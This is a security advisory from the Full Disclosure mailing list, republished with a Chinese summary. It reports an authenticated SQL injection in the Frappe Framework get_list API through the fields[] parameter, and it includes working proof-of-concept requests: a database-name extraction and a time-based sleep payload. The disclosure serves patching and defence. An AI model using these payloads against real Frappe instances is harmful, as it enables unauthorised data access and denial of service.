Structured Query Language Injection in frappe.desk.reportview.get_list Endpoint in Frappe Framework
Frappe Framework的`frappe.desk.reportview.get_list` API存在SQL注入漏洞,影响v15.56.1版本。由于`fields[]`参数未正确清理,低权限用户可注入任意SQL表达式至SELECT子句中。示例显示攻击者可获取数据库信息或执行时间延迟攻击。 2025-5-28 03:19:56 Author: seclists.org(查看原文) 阅读量:4 收藏
Frappe Framework的`frappe.desk.reportview.get_list` API存在SQL注入漏洞,影响v15.56.1版本。由于`fields[]`参数未正确清理,低权限用户可注入任意SQL表达式至SELECT子句中。示例显示攻击者可获取数据库信息或执行时间延迟攻击。 2025-5-28 03:19:56 Author: seclists.org(查看原文) 阅读量:4 收藏
Full Disclosure mailing list archives
From: Ron E <ronaldjedgerson () gmail com>
Date: Tue, 27 May 2025 17:04:14 -0400
An authenticated SQL injection vulnerability exists in the frappe.desk.reportview.get_list API of the Frappe Framework,
affecting versions v15.56.1. The vulnerability stems from improper sanitization of the fields[] parameter, which allows
low-privileged users to inject arbitrary SQL expressions directly into the SELECT clause.
Sample Structured Query Language Injection:
Request:
GET
/api/method/frappe.desk.reportview.get_list?fields=%5B%22salary_component_abbr%2c(SELECT%20database())%20AS%20current_db%22%5D&doctype=Salary%20Component&limit=20&_=1748066407934
HTTP/2
Host: --host--
Cookie: ******
--snip--
Response:
HTTP/2 200 OK
{"message":[{"salary_component_abbr":"H***","current_db":"_**************"},
--snip--
Time based attack:
Request
GET
/api/method/frappe.desk.reportview.get_list?fields=[%22salary_component_abbr%2c(select*from(select(sleep(200)))a)%22]&doctype=Salary%20Component&limit=20&_=1748066407933
HTTP/2
Host: --host--
Cookie: ******
--snip--
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Current thread:
- Structured Query Language Injection in frappe.desk.reportview.get_list Endpoint in Frappe Framework Ron E (May 27)
文章来源: https://seclists.org/fulldisclosure/2025/May/22
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh